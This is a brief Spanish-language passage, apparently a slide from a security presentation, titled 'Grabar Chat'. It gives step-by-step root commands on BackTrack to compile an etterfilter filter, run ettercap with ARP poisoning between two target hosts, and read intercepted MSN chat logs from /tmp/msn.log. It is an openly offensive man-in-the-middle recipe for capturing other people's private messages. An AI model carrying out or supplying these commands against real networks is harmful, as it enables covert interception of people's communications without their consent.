  • 51. Grabar Chat 2. compilar: root@bt#etterfilterverchar -o verchat.ef 3. Ejecutar el filtro + envenamiento ARP root@bt#ettercap -T -q -i eth0 -F verchat.ef -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO 4. Revisar el archivo /tmp/msn.log 38